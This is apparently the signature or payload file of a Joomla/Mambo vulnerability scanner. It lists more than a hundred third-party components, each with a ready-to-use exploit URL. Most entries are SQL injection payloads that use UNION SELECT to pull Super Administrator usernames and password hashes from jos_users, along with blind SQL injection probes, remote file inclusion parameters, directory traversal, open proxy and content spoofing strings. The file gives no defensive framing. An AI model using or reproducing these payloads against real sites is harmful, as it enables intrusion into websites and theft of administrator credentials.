Component: People Book   File Inclusion Vulnerability	Versions effected: 1.1.5 and older|/administrator/components/com_peoplebook/param.peoplebook.php|/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
Component: Feederator - RSS manager Component  Multiple Remote File Inclusion Vulnerabilities   Version Affected:   1.0.5 <= |/components/com_recly/|/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode]              /components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode]                  /components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode]        /components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path=
Component: Joomla com_books(book_id) SQL Injection Vulnerability    Version Affected:   <= |/components/com_books/|/index.php?option=com_books&task=book_details&book_id=-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_catalogproduction (id)  SQL Injection Vulnerability   Version Affected:    N/A |/components/com_catalogproduction/|/index.php?option=com_catalogproduction&task=viewdetail&id=-9999+union+all+select+1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Simple RSS Reader Component  Remote File Inclusion Vulnerability    Version Affected:  1.0  <= |/components/com_rssreader/|/components/com_rssreader/admin.rssreader.php?mosConfig_live_site=
Component: Hot Property   Version Affected:    0.97<= |/components/com_hotproperties/|N/A
Component: com_contactinfo(catid) SQL Injection Vulnerability Version Affected:    N/A|/components/com_contactinfo/|/index.php?option=com_contactinfo&catid=-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--/*
Component: A6MamboCredits  File Inclusion Vulnerability   Versions effected: Any|/administrator/components/com_a6mambocredits/|/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path=
Component: A6MamboHelpDesk   File Inclusion Vulnerability   Versions effected: Any Version|/administrator/components/com_a6mambohelpdesk/|/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=
Component: Colophon File Inclusion Vulnerability     Versions effected: 1.2 and older|/administrator/components/com_colophon/|/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=
Component: Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0<= |/administrator/components/com_comprofiler/plugin.class.php|/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
Component: MambelFish  RFI Vulnerability  Versions effected: 1.x and older|/administrator/components/com_mambelfish/|/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=
Component: Com Profiler Blind SQL Injection	Vulnerability Versions effected: 1.0 RC2 and older|/administrator/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=1::/index.php?option=com_comprofiler&task=userProfile&user=1+and+1=2
Component: User Home Pages 2   File Inclusion Vulnerability  Versions effected: 1.1.1 and older|/administrator/components/com_uhp2/|/administrator/components/com_uhp2/uhp_config.php?mosConfig_absolute_path=
Component: User Home Pages 1   File Inclusion Vulnerability 	Versions effected: 1.1.1 and older|/administrator/components/com_uhp/|/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=
Component: Bayesian Naive Filter 	File Inclusion Vulnerability  Versions effected: 1.1 and older|/administrator/components/com_bayesiannaivefilter/|/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=
Component: Webring    File Inclusion Vulnerability    Versions effected: 1.0 and older|/administrator/components/com_webring/|/administrator/components/com_webring/admin.webring.docs.php?component_dir=
Component: JIM  File Inclusion Vulnerability Versions effected: 1.0.1 and older|/administrator/components/com_jim/|/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=
Component: Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability  Versions effected: Any Version|/administrator/components/com_mgm/|/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=
Component: Link Directory   File Inclusion Vulnerability	 Versions effected: Any Version|/administrator/components/com_linkdirectory/|/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
Component: Kochsuite    File Inclusion Vulnerability    	Versions effected: 0.9.4 and older|/administrator/components/com_kochsuite /|/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=
Component: SWmenu   File Inclusion Vulnerability	  Versions effected: 4.0 and older|/administrator/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=
Component: JoomlaPack       File Inclusion Vulnerability     Versions effected: 1.0.4a2 RE and older|/administrator/components/com_jpack/|/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path=
Component: Joomla Radio 5    File Inclusion Vulnerability 	Versions effected: 5.0 and older|/administrator/components/com_joomlaradiov5/|/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=
Component: Joomla Flash Fun!  	  File Inclusion Vulnerability	 Versions effected: 1.0 and older|/administrator/components/com_joomlaflashfun/|/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
Component: JContentSubscription    File Inclusion Vulnerability   Versions effected: 1.5.8 and older|/administrator/components/com_jcs/|/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=
Component: Joomla Flash Uploader    File Inclusion Vulnerability   Versions effected: 2.5.2 and older|/administrator/components/com_joomla_flash_uploader/|/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
Component: MosMedia     File Inclusion Vulnerability    Versions effected: 1.0.8 and older|/administrator/components/com_mosmedia/|/administrator/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=
Component: WmT Advanced Flash Gallery     File Inclusion Vulnerability  Versions effected: 1.0 and older|/administrator/components/com_wmtgallery/|/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=
Component: Webmaster Tips Portfolio    File Inclusion Vulnerability   Versions effected: 1.0 and older|/administrator/components/com_wmtportfolio/|/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=
Component: Color Lab    File Inclusion Vulnerability   Versions effected: 1.0 and older|/administrator/components/com_colorlab/|/administrator/components/com_color/admin.color.php?mosConfig_live_site=
Component: Carousel Flash Image Gallery    File Inclusion Vulnerability    Versions effected: 1.0 and older|/administrator/components/com_jjgallery/|/administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
Component: eXtplorer Local Directory Traversal  Vulnerability Versions Affected: 2.0.0 RC2 <= |/extplorer/|/index.php?com_extplorer-test2
Component: JUser     File Inclusion Vulnerability    Versions effected: 1.0.14 and older|/administrator/components/com_juser/|/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
Component: eXtplorer 	Local Directory Traversal  Vulnerability Versions Affected: 2.0.0 RC2 <= |/eXtplorer/|/index.php?com_extplorer-test3
Component: eXtplorer 	Local Directory Traversal  Vulnerability Versions Affected: 2.0.0 RC2 <= |/administrator/components/com_extplorer/|/index.php?com_extplorer-test1
Component: Joomla! 12Pictures     File Inclusion Vulnerability  Versions effected: 1.0 and older|/administrator/components/com_joom12pic/|/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Component: Flash Panoramic View     File Inclusion Vulnerability   Versions effected: 1.0 and older|/administrator/components/com_panoramic/|/administrator/components/com_panoramic/admin.panoramic.php?mosConfig_live_site=
Component: Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0<= |/components/com_comprofiler/plugin.class.php|/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
Component: com_djiceshoutbox Persistent XSS Vulnerability   Versions Affected: 1.0|/components/com_djiceshoutbox/|/index.php?option=com_djiceshoutbox&view=ajax&format=djiceshoutbox
Component: com_flyspray    File Inclusion Vulnerability     Versions Affected: N/A|/components/com_flyspray/startdown.php|/components/com_flyspray/startdown.php?file=
Component: ExtCalendar  File Inclusion Vulnerability	Versions effected: 0.9.1 and older|/components/com_extcalendar/extcalendar.php|/components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
Component: PC CookBook   File Inclusion Vulnerability 	Versions effected: 1.3 and older|/components/com_pccookbook/pccookbook.php|/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
Component: com_smf    File Inclusion Vulnerability     Versions Affected: N/A|/components/com_smf/smf.php|/components/com_smf/smf.php?mosConfig_absolute_path=
Component: com_loudmounth    File Inclusion Vulnerability     Versions Affected: N/A|/components/com_loudmounth/includes/abbc/abbc.class.php|/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=
Component: Multibanners  File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_multibanners/extadminmenus.class.php|/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=
Component: Cmimarketplace (viewit) Directory Traversal Vulnerability   Versions Affected: N/A|/components/com_cmimarketplace/|/index.php?option=com_cmimarketplace&Itemid=1&viewit=/../../&cid=1
Component: akocomments.php    File Inclusion Vulnerability     Versions Affected: N/A|/akocomments.php|/akocomments.php?mosConfig_absolute_path=
Component: Crop Image  File Inclusion Vulnerability 	Versions effected: 1.0 and older|/administrator/components/com_cropimage/admin.cropcanvas.php|/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=
Component: Serverstat 	  File Inclusion Vulnerability	 Versions effected: 0.4.4 and older|/administrator/components/com_serverstat/install.serverstat.php|/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=
Component: com_ijoomla_archive (catid) Blind SQL Injection Vulnerability   Versions Affected: N/A|/components/com_ijoomla_archive/|/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=1::/index.php?option=com_ijoomla_archive&task=archive&search_archive=1&act=search&catid=1+and+1=2
Component: Remository   File Inclusion Vulnerability		Versions effected: 3.25 and older|/administrator/components/com_remository/admin.remository.php|/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=
Component: Lurm Constructor   File Inclusion Vulnerability	Versions effected: 0.6b and older|/administrator/components/com_lurm_constructor/admin.lurm_constructor.php|/administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=
Component: com_digistore (pid) Blind SQL Injection Vulnerability   Versions Affected: N/A|/components/com_digistore/|/index.php?option=com_digistore&task=show_product&pid=1+and+1=1::/index.php?option=com_digistore&task=show_product&pid=1+and+1=2
Component: Php Shop 	  File Inclusion Vulnerability	 Versions effected: 1.2 RC2b and older|/administrator/components/com_phpshop/toolbar.phpshop.html.php|/administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
Component: com_maianmusic SQL Injection Vulnerability Versions effected: 1.2.1|/components/com_maianmusic/|/index.php?option=com_maianmusic&section=category&category=-1+union+select+1,2,3,concat(username,char(58),password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=1
Component: Mambo eMail Publisher    File Inclusion Vulnerability Versions Affected: N/A|/administrator/components/com_mmp/help.mmp.php|/administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=
Component: BSQ Site Stats   File Inclusion Vulnerability  Versions effected: N/A|/components/com_bsq_sitestats/external/rssfeed.php|/components/com_bsq_sitestats/external/rssfeed.php?baseDir=
Component: CHRONOContact    File Inclusion Vulnerability	 	Versions effected: N/A|/administrator/components/com_chronocontact/excelwriter/PPS/File.php|/administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=
Component: com_feederator   File Inclusion Vulnerability     Versions Affected: N/A|/components/com_feederator/includes/tmsp/add_tmsp.php|/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=
Component: com_feederator   File Inclusion Vulnerability     Versions Affected: N/A|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php|/administrator/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=
Component: com_bookjoomlas SQL Injection Vulnerability Versions effected: 0.1|/components/com_bookjoomlas/|/index.php?option=com_bookjoomlas&Itemid=1&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: GameQ  SQL Injection  Vulnerability  Version Affected: 4.0<= |/components/com_gameq/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11,12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: astatsPRO   SQL Injection Vulnerability	Versions effected: 1.0.0 and older|/administrator/components/com_astatspro/refer.php|/administrator/components/com_astatspro/refer.php?id=-1+UNION+SELECT+0,1,concat(username,0x3a,password,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- 
Component: prayercenter SQL injection Vulnerability Version Affected: N/A|/components/com_prayercenter/|/index.php?option=com_prayercenter&task=view_request&id=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: pcchess   SQL Injection Vulnerability	Versions effected: N/A|/components/com_pcchess/|/index.php?option=com_pcchess&Itemid=61&page=players&user_id=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_garyscookbook    SQL Injection Vulnerability   Versions Affected: N/A|/components/com_garyscookbook/|/index.php?option=com_garyscookbook&Itemid=21&func=detail&id=-666+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_hello_world    SQL Injection Vulnerability	Versions Affected: N/A|/components/com_hello_world/|/index.php?option=com_hello_world&Itemid=27&task=show&type=intro&id=-9999999+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_cms     SQL Injection Vulnerability	 Versions Affected: N/A|/components/com_cms/|/index.php?option=com_cms&act=viewitems&cat_id=-9999999+UNION+SELECT+111,111,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),222,222,333,333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_most    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_most/|/index.php?option=com_most&mode=email&secid=-9999999+UNION+SELECT+0000,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,3333+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_idvnews    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_idvnews/|/index.php?option=com_idvnews&id=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2222,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_joomlavvz   SQL Injection Vulnerability     Versions Affected: N/A|/components/com_joomlavvz/|/index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-9999999+UNION+SELECT+0x3a,0x3a,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_referenzen    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_referenzen/|/index.php?option=com_referenzen&Itemid=7&detail=-9999999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_genealogy    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_genealogy/|/index.php?option=com_genealogy&task=profile&id=-9999999+UNION+SELECT+0,1,2,3,4,5,6,7,8,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_listoffreeads    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_listoffreeads/|/index.php?option=com_listoffreeads&AdId=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_geoboerse    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_geoboerse/|/index.php?option=com_geoboerse&page=view&catid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_ricette    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_ricette/|/index.php?option=com_ricette&Itemid=1&func=detail&id=-9999999+UNION+SELECT+0,0,111,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_team   SQL Injection Vulnerability     Versions Affected: N/A|/components/com_team/|/index.php?option=com_team&gid=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,username,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_formtool    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_formtool/|/index.php?option=com_formtool&task=view&formid=2&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_sg    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_sg/|/index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999+UNION+SELECT+0,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0,0,0,0,0,0,10,11,0,0,14,15,16+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: faq 	SQL Injection Vulnerability Versions effected: N/A|/components/com_faq/|/index.php?option=faq&task=viewallfaq&catid=-9999999+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_omnirealestate    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_omnirealestate/|/index.php?option=com_omnirealestate&Itemid=0&func=showObject&info=contact&objid=-9999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&results=joomla
Component: com_model    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_model/|/index.php?option=com_model&Itemid=0&task=pipa&act=2&objid=-9999+UNION+SELECT+username,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_mezun    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_mezun/|/index.php?option=com_mezun&task=edit&hidemainmenu=joomla&id=-9999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_ewriting    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_ewriting/|/index.php?option=com_ewriting&Itemid=9999&func=SELECTcat&cat=-1+UNION+ALL+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_livechat   SQL Injection Vulnerability     Versions Affected: N/A|/components/com_livechat/getSavedChatRooms.php|/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_livechat   SQL Injection Vulnerability     Versions Affected: N/A|/administrator/components/com_livechat/getSavedChatRooms.php|/administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex(hex(concat(username,0x3a,password))),3%20from%20jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_letterman  Remote File Inclusion Vulnerability Versions effected: N/A|/components/com_letterman/|/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=
Component: com_livechat   Open Proxy  Vulnerability     Versions Affected: N/A|/components/com_livechat/xmlhttp.php|/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
Component: com_livechat   Open Proxy  Vulnerability     Versions Affected: N/A|/administrator/components/com_livechat/xmlhttp.php|/administrator/components/com_livechat/xmlhttp.php?GET$01$2$3$4$5$http://www.google.com
Component: com_mydyngallery    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_mydyngallery/|/index.php?option=com_mydyngallery&directory=zzz'+union+select+0,1,2,concat(0x3C703E,username,0x7c,password,0x3C2F703E),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_jmovies    SQL Injection Vulnerability     Versions Affected: N/A|/components/com_jmovies/|/index.php?option=com_jmovies&Itemid=29&task=detail&id=-1+union+select+1,concat(0x215F,username,0x3a,password,0x215F)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_tech_article SQL Injection Vulnerability     Versions Affected: N/A|/components/com_tech_article/|/index.php?option=com_tech_article&task=item&Itemid=17&item=-1+union+select+0,concat(username,0x3a,password),0,0,0,0,0,0,0+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_hbssearch Blind SQL Injection Vulnerability     Versions Affected: N/A|/components/com_hbssearch/|/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=1::/index.php?option=com_hbssearch&task=showhoteldetails&id=4&chkin=2008-08-15&chkout=2008-08-18&datedif=3&str_day=Fri&end_day=Mon&start_day=&star=&child1=0&adult1=1&Itemid=54&r_type=1+and+1=2
Component: com_tophotelmodule  Blind  SQL Injection Vulnerability     Versions Affected: N/A|/components/com_tophotelmodule/|/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1+and+1=1::/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1+and+1=2
Component: com_volunteer  SQL Injection Vulnerability    Version Affected: N/A|/components/com_volunteer/|/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&filter=&city_id=&function_id=&limit=5&pageno=1
Component: com_lowcosthotels (id)  Blind SQL Injection Vulnerability   Versions Affect: N/A|/components/com_lowcosthotels/|/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_lowcosthotels&task=showhoteldetails&id=1+and%201=2
Component: com_allhotels (id)  Blind SQL Injection Vulnerability    Versions Affect: N/A|/components/com_allhotels/|/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=1::/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%201=2
Component: com_ice(catid) Blind SQL Injection  Vulnerability Versions Affected: N/A |/components/com_ice/|/index.php?option=com_ice&catid=1 and 1=1::/index.php?option=com_ice&catid=1 and 1=2
Component: com_liveticker(tid) Blind SQL Injection  Vulnerability Versions Affected: N/A|/components/com_liveticker/|/index.php?option=com_liveticker&task=viewticker&tid=1 and 1=1::/index.php?option=com_liveticker&task=viewticker&tid=1 and 1=2
Component: com_mdigg(category) SQL Injection vulnerability   Versions Affected: N/A|/components/com_mdigg/|/index.php?option=com_mdigg&act=story_lists&task=view&category=-9999/**/union/**/all/**/select/**/1,2,3,4,concat(username,0x3a,password),6,7,8,9,0,11,12,13/**/from/**/jos_users/*
Component: Joomla Module com_5starhotels(id) SQL  Vulnerability   Versions Affected: N/A|/components/com_5starhotels/|/index.php?option=com_5starhotels&task=showhoteldetails&id=1+union+select+1,concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: PAX Gallery (gid) Blind SQL Injection Vulnerability  Versions effected: v 0.1 <= |/components/com_paxgallery/|/index.php?option=com_paxgallery&task=table&gid=1%20and%201=1::/index.php?option=com_paxgallery&task=table&gid=1%20and%201=2
Component: com_na_content Blind SQL Injection Vulnerability Versions effected: v 1.0 <= |/components/com_na_content/|/index.php?option=com_na_content&task=view&id=1+and+1=1::/index.php?option=com_na_content&task=view&id=1+and+1=2
Component: com_na_mydocs (errmsg) Content Spoofing Vulnerability   Version Affected: N/A|/components/com_na_mydocs/|/index.php?option=com_na_mydocs&task=showerr&errmsg=Your%20site%20has%20been%20hacked!
Component: com_simple_review SQL injection Vulnerability Versions effected: N/A|/components/com_simple_review/|/index.php?option=com_simple_review&category=4+AND+1=2+UNION+SELECT+0,concat_ws(username,0x3a,password),2+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_na_newsdescription SQL Injection Vulnerability Versions effected: N/A|/components/com_na_newsdescription/|/index.php?option=com_na_newsdescription&task=show&groupId=17377_19&newsid=85790+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2,3,4,5,6,7+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_phocadocumentation SQL Injection Vulnerability Versions effected: N/A|/components/com_phocadocumentation/|/index.php?option=com_phocadocumentation&view=section&id=1+AND+1=2+UNION+SELECT+concat(username,0x3a,password),1,2+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_xevidmegahd SQL Injection Vulnerability Versions effected: N/A|/components/com_xevidmegahd/|/index.php?option=com_xevidmegahd&Itemid=99999&func=viewcategory&catid=1+UNION+SELECT+concat(username,0x3a,password)+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_jashowcase SQL Injection Vulnerability Versions effected: N/A|/components/com_jashowcase/|/index.php?option=com_jashowcase&view=jashowcase&Itemid=109&catid=34+AND+1=2+UNION+SELECT+0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12+from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_newsflash SQL Injection Vulnerability Versions effected: N/A|/components/com_newsflash/|/index.php?option=com_newsflash&catid=0&id=8+and+1=1+union+select+1,username,password,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: Portfol (com_portfol) SQL Injection Vulnerability Versions effected: 1,2|/components/com_portfol/|/index.php?option=com_portfol&Itemid=814&task=viewcategory&vcatid=-96+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_gigcal  variant#1 SQL Injection Vulnerability Versions effected: N/A|/components/com_gigcal/|/index.php?option=com_gigcal&task=details&gigcal_gigs_id=402'+and+1=2/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,concat(username,char(58),password),0,11,12+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*&Itemid=37
Component: com_gigcal variant#2 SQL Injection Vulnerability Versions effected: N/A|/components/com_gigcal/|/index.php?option=com_gigcal&Itemid=78&id=-999+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72/*
Component: Camelcitydb2 SQL Injection Vulnerability Versions effected: N/A|/components/com_camelcitydb2/|/index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&view=detail&Itemid=15
Component: com_fantasytournament SQL Injection Vulnerability Versions effected: N/A|/components/com_fantasytournament/|/index.php?option=com_fantasytournament&Itemid=&func=managersByManager&managerID=-63+union+select+concat(username,char(58),password),2,3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Component: com_rdautos SQL Injection Vulnerability Versions effected: N/A|/components/com_rdautos/|/index.php?option=com_rdautos&view=category&id=-1+union+select+concat(username,char(58),password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=54
Component: com_news SQL Injection Vulnerability Versions effected: N/A|/components/com_news/|/index.php?option=com_news&id=-148+UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
